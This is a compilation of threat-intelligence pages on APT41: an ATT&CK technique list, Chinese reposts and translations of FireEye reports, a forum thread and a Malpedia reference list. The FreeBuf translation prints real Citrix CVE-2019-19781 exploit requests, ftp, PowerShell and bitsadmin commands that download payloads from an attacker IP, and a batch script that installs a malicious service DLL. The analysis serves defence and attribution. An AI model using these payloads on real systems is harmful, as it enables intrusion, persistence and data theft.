Obfuscated Files or Information: Indicator Removal from Tools,

Obfuscated Files or Information: Command Obfuscation,

OS Credential Dumping: LSASS Memory,

Process Discovery,

Process Injection: Dynamic-link Library Injection,

Query Registry,

Reflective Code Loading,

Scheduled Task/Job: Scheduled Task,

Screen Capture,

Steal or Forge Kerberos Tickets: Kerberoasting,

Unsecured Credentials: Credentials in Registry,

Unsecured Credentials: Group Policy Preferences,

Windows Management Instrumentation

S0006

pwdump

[1]

OS Credential Dumping: Security Account Manager

S0112

ROCKBOOT

[1]

Pre-OS Boot: Bootkit

S0596

ShadowPad

[1][8]

Application Layer Protocol: DNS,

Application Layer Protocol: File Transfer Protocols,

Application Layer Protocol: Web Protocols,

Data Encoding: Non-Standard Encoding,

Deobfuscate/Decode Files or Information,

Dynamic Resolution: Domain Generation Algorithms,

Indicator Removal,

Ingress Tool Transfer,

Modify Registry,

Non-Application Layer Protocol,

Obfuscated Files or Information: Fileless Storage,

Obfuscated Files or Information,

Process Discovery,

Process Injection,

Process Injection: Dynamic-link Library Injection,

Scheduled Transfer,

System Information Discovery,

System Network Configuration Discovery,

System Owner/User Discovery,

System Time Discovery

S0430

Winnti for Linux

[3]

Application Layer Protocol: Web Protocols,

Deobfuscate/Decode Files or Information,

Encrypted Channel: Symmetric Cryptography,

Ingress Tool Transfer,

Non-Application Layer Protocol,

Obfuscated Files or Information,

Rootkit,

Traffic Signaling

S0412

ZxShell

[1]

Access Token Manipulation: Create Process with Token,

Application Layer Protocol: Web Protocols,

Application Layer Protocol: File Transfer Protocols,

Command and Scripting Interpreter: Windows Command Shell,

Create Account: Local Account,

Create or Modify System Process: Windows Service,

Data from Local System,

Endpoint Denial of Service,

Exploit Public-Facing Application,

File and Directory Discovery,

Impair Defenses: Disable or Modify System Firewall,

Impair Defenses: Disable or Modify Tools,

Indicator Removal: Clear Windows Event Logs,

Indicator Removal: File Deletion,

Ingress Tool Transfer,

Input Capture: Credential API Hooking,

Input Capture: Keylogging,

Modify Registry,

Native API,

Network Service Discovery,

Non-Standard Port,

Process Discovery,

Process Injection: Dynamic-link Library Injection,

Proxy,

Query Registry,

Remote Services: VNC,

Remote Services: Remote Desktop Protocol,

Screen Capture,

System Binary Proxy Execution: Rundll32,

System Information Discovery,

System Owner/User Discovery,

System Service Discovery,

System Services: Service Execution,

Video Capture

References

Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.

Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.

Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.

Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.

Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.

Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.

Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.

×

load more results

Contact Us

Terms of Use

Privacy Policy

Website Changelog

© 2015 - 2024, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.

美国公司fireeye对APT41的调查报告原文 - 知乎

美国公司fireeye对APT41的调查报告原文 - 知乎切换模式写文章登录/注册美国公司fireeye对APT41的调查报告原文烟斗汪game热爱好游戏,探索新事物我认为fireeye是一个危险的美国公司,严重威胁中国的网络安全,说真的,肯定是美国政府的走狗!原文如下:Threat ResearchAPT41: A Dual Espionage and Cyber Crime OperationAugust 07, 2019 | by Nalani Fraser, Fred Plan, Jacqueline O’Leary, Vincent Cannon, Raymond Leong, Dan Perez, Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).Who Does APT41 Target?Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.Figure 1: Timeline of industries directly targeted by APT41Probable Chinese Espionage ContractorsTwo identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012The Right Tool for the JobAPT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.Fast and RelentlessAPT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.Looking AheadAPT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.(图片未上传)发布于 2019-10-12 23:52美国公司美国调查报告​赞同 1​​2 条评论​分享​喜欢​收藏​申请

APT41多漏洞网络攻击分析 - FreeBuf网络安全行业门户

APT41多漏洞网络攻击分析 - FreeBuf网络安全行业门户

主站 分类

漏洞

工具

极客

Web安全

系统安全

网络安全

无线安全

设备/客户端安全

数据安全

安全管理

企业安全

工控安全

特色

头条

人物志

活动

视频

观点

招聘

报告

资讯

区块链安全

标准与合规

容器安全

公开课

报告 专辑 ···公开课···商城···

用户服务

··· 行业服务

政 府

CNCERT

CNNVD

会员体系(甲方)

会员体系(厂商)

产品名录

企业空间

知识大陆 搜索 创作中心 登录注册 官方公众号企业安全新浪微博 FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。 FreeBuf+小程序把安全装进口袋 APT41多漏洞网络攻击分析

关注

网络安全 APT41多漏洞网络攻击分析

2020-04-20 13:00:41

研究人员发现自今年开始APT41开展了大范围的网络活动。从1月20日到3月11日APT41利用了Citrix NetScaler/ADC,Cisco路由器和Zoho ManageEngine Desktop Central等漏洞进行攻击攻击活动。目标国家包括澳大利亚,加拿大,丹麦,芬兰,法国,印度,意大利,日本,马来西亚,墨西哥,菲律宾,波兰,卡塔尔,沙特,新加坡,瑞典,瑞士,阿联酋,英国和美国等。目标行业包括:银行/金融,建筑,国防工业,政府,医疗,高科技,高等教育,法律,制造业,媒体,石油和天然气,制药,房地产,电信,运输,旅行等。目前尚不清楚APT41是扫描全网进行大规模攻击还是选择了特定目标,但从受害者角度来看攻击更具针对性。漏洞利用CVE-2019-19781 (Citrix Application Delivery Controller [ADC])2020年1月20日开始,APT41使用IP地址66.42.98 [.] 220尝试利用漏洞CVE-2019-19781(于2019年12月17日发布)。时间线:最初利用CVE-2019-19781攻击发生在2020年1月20日和2020年1月21日,攻击活动中会执行命令‘file /bin/pwd’。 首先将确认系统是否存在漏洞,有没有部署相关漏洞缓解措施。 其次返回目标体系结构相关信息,为APT41后续部署后门提供信息。所有观察到的请求仅针对Citrix设备执行,APT41利用已知设备列表进行操作。HTTP POST示例:POST /vpns/portal/scripts/newbm.pl HTTP/1.1Host: [redacted]Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.22.0NSC_NONCE: nsrootNSC_USER: ../../../netscaler/portal/templates/[redacted]Content-Length: 96url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]1月23日至2月1日之间APT41活动暂停,从2月1日开始APT41开始使用CVE-2019-19781漏洞,这些载荷通过FTP下载。 APT41执行命令'/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’,连接到66.42.98 [.] 220,使用用户名“ test”和密码登录到FTP服务器,然后下载“ bsd”有效负载(可能是后门)。HTTP POST示例:POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 147Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]2月24日和2月25日CVE-2019-19781的利用次数显着增加,仅载荷名发生了变化。POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 145Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]Cisco Router2020年2月21日APT41成功攻击了一家电信组织的Cisco RV320路由器,并下载了为名为“ fuc”(MD5:155e98e5ca8d662fad7dc84187340cbc)的64位MIPS有效负载。Metasploit模块结合了两个CVE(CVE-2019-1653和CVE-2019-1652)在Cisco RV320和RV325小型企业路由器上实现远程代码执行,并使用wget下载有效负载。66.42.98 [.] 220还托管了文件http://66.42.98[.] 220/test/1.txt(MD5:c0c467c8e9b2046d7053642cc9bdd57d)的内容为“ cat/etc/flash/etc/nk_sysconfig”,该命令可在Cisco RV320路由器上执行显示当前配置。 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability Cisco Small Business RV320 and RV325 Routers Command Injection VulnerabilityCVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)3月5日研究人员发布了CVE-2020-10189验证代码。 从3月8日开始APT41使用91.208.184 [.] 78来试图利用Zoho ManageEngine漏洞,有效负载(install.bat和storesyncsvc.dll)有两个不同的变化。 在第一个变体中,使用CVE-2020-10189漏洞直接上传“ logger.zip”,其中包含一组命令可使用PowerShell下载并执行install.bat和storesyncsvc.dll。java/lang/RuntimegetRuntime()Ljava/lang/Runtime;Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat'(Ljava/lang/String;)Ljava/lang/Process;StackMapTableysoserial/Pwner76328858520609Lysoserial/Pwner76328858520609;在第二个版本中APT41利用Microsoft BITSAdmin工具从66.42.98 [.] 220端口12345下载install.bat(MD5:7966c2c546b71e800397a67f942858d0)。Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exeProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat两种变体都使用install.bat批处理文件来安装名为storesyncsvc.dll(MD5:5909983db4d9023e4098e56361c96a6f)。install.bat内容:@echo offset "WORK_DIR=C:\Windows\System32"set "DLL_NAME=storesyncsvc.dll"set "SERVICE_NAME=StorSyncSvc"set "DISPLAY_NAME=Storage Sync Service"set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." sc stop %SERVICE_NAME%sc delete %SERVICE_NAME%mkdir %WORK_DIR%copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Yreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /fsc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "%SERVICE_NAME%" "%DESCRIPTION%"reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /fnet start "%SERVICE_NAME%"与c2服务通联:GET /jquery-3.3.1.min.js HTTP/1.1Host: cdn.bootcss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://cdn.bootcss.com/Accept-Encoding: gzip, deflateCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLIUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-Alive Cache-Control: no-cache在攻击利用几个小时内,APT41使用storecyncsvc.dll BEACON后门下载了具有不同C2地址的辅助后门,然后下载2.exe(MD5:3e856162c36b532925c8226b4ed3481c)。2.exe是VMProtected Meterpreter下载器,用于下载Cobalt Strike BEACON shellcode。该组利用多次入侵来延迟对其其他工具的分析。总结APT41这次活动中的扫描和攻击体现了其漏洞利用速度越来越快,目标信息搜集范围逐步扩大。此前美国防部确认,APT41成功利用CVE-2019-3396(Atlassian Confluence)攻击美国一所大学。可见APT41在从事间谍活动同时也在进行以经济利益为动机的网络活动。IOCs Type Indicator CVE-2019-19781 Exploitation (Citrix Application Delivery Control) 66.42.98[.]220 CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’ /tmp/bsd /tmp/un Cisco Router Exploitation 66.42.98\.220 ‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc CVE-2020-10189 (Zoho ManageEngine Desktop Central) 66.42.98[.]220 91.208.184[.]78 74.82.201[.]8 exchange.dumb1[.]com install.bat (MD5: 7966c2c546b71e800397a67f942858d0) storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f) C:\Windows\Temp\storesyncsvc.dll C:\Windows\Temp\install.bat 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c) C:\Users\[redacted]\install.bat TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9) C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78 PowerShell downloading files with Net.WebClient Platform Signature Name Endpoint Security BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY) CERTUTIL.EXE DOWNLOADER A (UTILITY) Generic.mg.5909983db4d9023e Generic.mg.3e856162c36b5329 POWERSHELL DOWNLOADER (METHODOLOGY) SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY) Network Security Backdoor.Meterpreter DTI.Callback Exploit.CitrixNetScaler Trojan.METASTAGE Exploit.ZohoManageEngine.CVE-2020-10198.Pwner Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader Helix CITRIX ADC [Suspicious Commands]  EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]  EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]  EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]  EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]  MALWARE METHODOLOGY [Certutil User-Agent]  WINDOWS METHODOLOGY [BITSadmin Transfer]  WINDOWS METHODOLOGY [Certutil Downloader] ATT&CK Techniques Initial Access External Remote Services (T1133), Exploit Public-Facing Application (T1190) Execution PowerShell (T1086), Scripting (T1064) Persistence New Service (T1050) Privilege Escalation Exploitation for Privilege Escalation (T1068) Command And Control Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) Defense Evasion BITS Jobs (T1197), Process Injection (T1055) *参考来源:fireeye,由Kriston编译,转载请注明来自FreeBuf.COM 本文作者:,

转载请注明来自FreeBuf.COM # 漏洞 # 攻击分析 # APT41

被以下专辑收录,发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

相关推荐

关 注 0 文章数 0 关注者 本站由阿里云 提供计算与安全服务 用户服务 有奖投稿 提交漏洞 参与众测 商城 企业服务 安全咨询 产业全景图 企业SRC 安全众测 合作信息 斗象官网 广告投放 联系我们 友情链接 关于我们 关于我们 加入我们 微信公众号 新浪微博 战略伙伴 FreeBuf+小程序 扫码把安全装进口袋 斗象科技 FreeBuf 漏洞盒子 斗象智能安全平台 免责条款 协议条款

Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved

   沪ICP备13033796号

|

沪公安网备

如何看待APT41攻击Team Viewer公司事件? - 知乎

如何看待APT41攻击Team Viewer公司事件? - 知乎首页知乎知学堂发现等你来答​切换模式登录/注册网络安全黑客 (Hacker)信息安全DDoS如何看待APT41攻击Team Viewer公司事件?APT41攻击Team Viewer的最大目的是什么,这将会给国内各单位及公司造成什么样的影响呢? [图片]显示全部 ​关注者9被浏览9,333关注问题​写回答​邀请回答​好问题​添加评论​分享​3 个回答默认排序西帅我是来知乎听故事的​ 关注APT41 并非境外组织,teamviewer 和其他英文机构没有报道,微博已自删,图片时间是 17 年的记录。发布于 2019-10-12 14:39​赞同 2​​1 条评论​分享​收藏​喜欢收起​知乎用户​乌龙事件,APT41 是国内的黑客组织,并且也没有第一手证据,还是前几年的事情。就现在情况看来,国外没有任何一家安全公司对此表示知情,如赛门铁克、卡巴斯基等均未对此发表评论,teamviewer官方也未对此事件发表看法或正式官方声明。倒是国内某些安全厂商借所谓不知真假的深圳网安的通知大做文章,呵呵了。奇安信:并没有发现近期TeamViewer被攻击植入恶意代码事件,所以不必产生不必要的恐慌,至于TeamViewer这个可能直接穿透防火墙的远控软件的使用是否符合公司和组织的安全策略还请慎重决择。编辑于 2019-10-12 21:17​赞同 3​​添加评论​分享​收藏​喜欢收起​​

APT41 (Threat Actor)

APT41 (Threat Actor)

Please enable JavaScript to use all features of this site. InventoryStatisticsUsageApiVectorLoginSYMBOLCOMMON_NAMEaka. SYNONYMS

APT41 

(Back to overview)

aka: Amoeba, BARIUM, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Brass Typhoon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Red Kelpie, TA415, WICKED PANDA, WICKED SPIDER

APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.

Associated Families

elf.messagetap

win.biopass

win.coldlock

win.crackshot

win.dboxagent

win.easynight

win.highnoon

win.highnoon_bin

win.jumpall

win.poisonplug

win.serialvlogger

win.zxshell

apk.dragonegg

win.chinachopper

win.acehash

win.blackcoffee

win.crosswalk

win.derusbi

win.gearshift

win.lowkey

win.moonbounce

win.skip20

elf.keyplug

apk.wyrmspy

win.cobalt_strike

win.plugx

win.shadowpad

References

×Select Content2024-03-01

HarfangLab

HarfangLab CTIA Comprehensive Analysis of i-SOON’s Commercial Offering ShadowPad

Winnti

×Select Content2024-03-01

Medium b.magnezi

0xMrMagneziMalware Analysis - Cobalt Strike Cobalt Strike

×Select Content2024-02-21

YouTube (SentinelOne)

Kris McConkeyLABSCon23 Replay | Chasing Shadows | The rise of a prolific espionage actor 9002 RAT

PlugX

ShadowPad

Spyder

×Select Content2024-02-09

Censys

Censys,

Embee_researchA Beginners Guide to Tracking Malware Infrastructure AsyncRAT

BianLian

Cobalt Strike

QakBot

×Select Content2024-02-08

YouTube (Embee Research)

Embee_researchCobalt Strike Decoding and C2 Extraction - 3 Minute Malware Analysis Speedrun Cobalt Strike

×Select Content2024-01-25

JSAC 2024

Yi-Chin Chuang,

Yu-Tung ChangUnveiling TeleBoyi: Chinese APT Group Targeting Critical Infrastructure Worldwide PlugX

×Select Content2024-01-25

JSAC 2024

Hara Hiroaki,

Kawakami Ryonosuke,

Shota NakajimaThe Secret Life of RATs: connecting the dots by dissecting multiple backdoors DracuLoader

GroundPeony

HemiGate

PlugX

×Select Content2024-01-23

CSIRT-CTI

CSIRT-CTIStately Taurus Targets Myanmar Amidst Concerns over Military Junta’s Handling of Rebel Attacks PlugX

TONESHELL

Unidentified 094

×Select Content2024-01-13

YouTube (Embee Research)

Embee_researchCobalt Strike Shellcode Analysis and C2 Extraction Cobalt Strike

×Select Content2024-01-12

Spamhaus

Spamhaus Malware LabsSpamhaus Botnet Threat Update Q4 2023 FluBot

Hook

FAKEUPDATES

AsyncRAT

BianLian

Cobalt Strike

DCRat

Havoc

IcedID

Lumma Stealer

Meterpreter

NjRAT

Pikabot

QakBot

Quasar RAT

RecordBreaker

RedLine Stealer

Remcos

Rhadamanthys

Sliver

×Select Content2024-01-09

Recorded Future

Insikt Group2023 Adversary Infrastructure Report AsyncRAT

Cobalt Strike

Emotet

PlugX

ShadowPad

×Select Content2024-01-04

Netresec

Erik HjelmvikHunting for Cobalt Strike in PCAP Cobalt Strike

×Select Content2023-12-20

Twitter (@embee_research)

Embee_researchDefeating Obfuscated Malware Scripts - Cobalt Strike Cobalt Strike

×Select Content2023-12-19

Twitter (@embee_research)

Embee_researchFree Ghidra Tutorials for Beginners Cobalt Strike

DarkGate

×Select Content2023-12-18

Medium (Cryptax)

Axelle ApvrilleOrganizing malware analysis with Colander: example on Android/WyrmSpy WyrmSpy

×Select Content2023-12-11

Sentinel LABS

Aleksandar Milenkoski,

Bendik HagenSandman APT | China-Based Adversaries Embrace Lua KEYPLUG

LuaDream

×Select Content2023-12-08

Twitter (@embee_research)

Embee_researchGhidra Basics - Manual Shellcode Analysis and C2 Extraction Cobalt Strike

×Select Content2023-12-06

splunk

Splunk Threat Research TeamUnmasking the Enigma: A Historical Dive into the World of PlugX Malware PlugX

×Select Content2023-12-04

The DFIR Report

The DFIR ReportSQL Brute Force leads to Bluesky Ransomware BlueSky

Cobalt Strike

×Select Content2023-11-19

Twitter (@embee_research)

Embee_researchCombining Pivot Points to Identify Malware Infrastructure - Redline, Smokeloader and Cobalt Strike Amadey

Cobalt Strike

RedLine Stealer

SmokeLoader

×Select Content2023-11-14

Medium joshuapenny88

Joshua PennyHostingHunter Series: CHANG WAY TECHNOLOGIES CO. LIMITED Hook

Hydra

Cobalt Strike

SectopRAT

×Select Content2023-11-10

NSFOCUS

NSFOCUSThe New APT Group DarkCasino and the Global Surge in WinRAR 0-Day Exploits Cobalt Strike

Konni

DarkCasino

Opal Sleet

×Select Content2023-11-07

SOCRadar

SOCRadarNew Gootloader Variant “GootBot” Changes the Game in Malware Tactics GootLoader

Cobalt Strike

UNC2565

×Select Content2023-11-06

Twitter (@embee_research)

Embee_researchUnpacking Malware With Hardware Breakpoints - Cobalt Strike Cobalt Strike

×Select Content2023-11-01

nccgroup

Mick KoomenPopping Blisters for research: An overview of past payloads and exploring recent developments Blister

Cobalt Strike

×Select Content2023-10-23

Twitter (@embee_research)

Embee_researchCobalt Strike .VBS Loader - Decoding with Advanced CyberChef and Emulation Cobalt Strike

×Select Content2023-10-20

Twitter (@embee_research)

Embee_researchDecoding a Cobalt Strike .hta Loader Using CyberChef and Emulation Cobalt Strike

×Select Content2023-10-18

Twitter (@embee_research)

Embee_researchGhidra Tutorial - Using Entropy To Locate a Cobalt Strike Decryption Function Cobalt Strike

×Select Content2023-10-12

Spamhaus

Spamhaus Malware LabsSpamhaus Botnet Threat Update Q3 2023 FluBot

AsyncRAT

Ave Maria

Cobalt Strike

DCRat

Havoc

IcedID

ISFB

Nanocore RAT

NjRAT

QakBot

Quasar RAT

RecordBreaker

RedLine Stealer

Remcos

Rhadamanthys

Sliver

Stealc

Tofsee

Vidar

×Select Content2023-10-12

Netresec

Erik HjelmvikForensic Timeline of an IcedID Infection Cobalt Strike

IcedID

IcedID Downloader

×Select Content2023-10-10

Symantec

Threat Hunter TeamGrayling: Previously Unseen Threat Actor Targets Multiple Organizations in Taiwan Cobalt Strike

Havoc

MimiKatz

Grayling

×Select Content2023-10-03

Malware Traffic Analysis

Brad Duncan2023-10-03 (Tuesday) - PikaBot infection with Cobalt Strike Cobalt Strike

Pikabot

×Select Content2023-10-02

ThreatFabric

ThreatFabricLightSpy mAPT Mobile Payment System Attack DragonEgg

WyrmSpy

lightSpy

×Select Content2023-09-22

Mandiant

Dan Black,

Josh Atkins,

Luke JenkinsBackchannel Diplomacy: APT29’s Rapidly Evolving Diplomatic Phishing Operations Brute Ratel C4

Cobalt Strike

EnvyScout

GraphDrop

QUARTERRIG

sRDI

Unidentified 107 (APT29)

×Select Content2023-09-12

ANSSI

ANSSIFIN12: A Cybercriminal Group with Multiple Ransomware BlackCat

Cobalt Strike

Conti

Hive

MimiKatz

Nokoyawa Ransomware

PLAY

Royal Ransom

Ryuk

SystemBC

×Select Content2023-09-12

Symantec

Threat Hunter TeamRedfly: Espionage Actors Continue to Target Critical Infrastructure ShadowPad

Redfly

×Select Content2023-09-08

PolySwarm Tech Team

The HivemindCarderbee Targets Hong Kong in Supply Chain Attack PlugX

Carderbee

×Select Content2023-09-07

Sekoia

Jamila B.My Tea’s not cold. An overview of China’s cyber threat Melofee

PingPull

SoWaT

Sword2033

MgBot

MQsTTang

PlugX

TONESHELL

Dalbit

MirrorFace

×Select Content2023-08-30

Trend Micro

Gilbert Sison,

Hara Hiroaki,

Lenart Bermejo,

Leon M Chang,

Ted LeeEarth Estries Targets Government, Tech for Cyberespionage Cobalt Strike

HemiGate

Earth Estries

×Select Content2023-08-28

The DFIR Report

The DFIR ReportHTML Smuggling Leads to Domain Wide Ransomware Cobalt Strike

IcedID

Nokoyawa Ransomware

×Select Content2023-08-22

Symantec

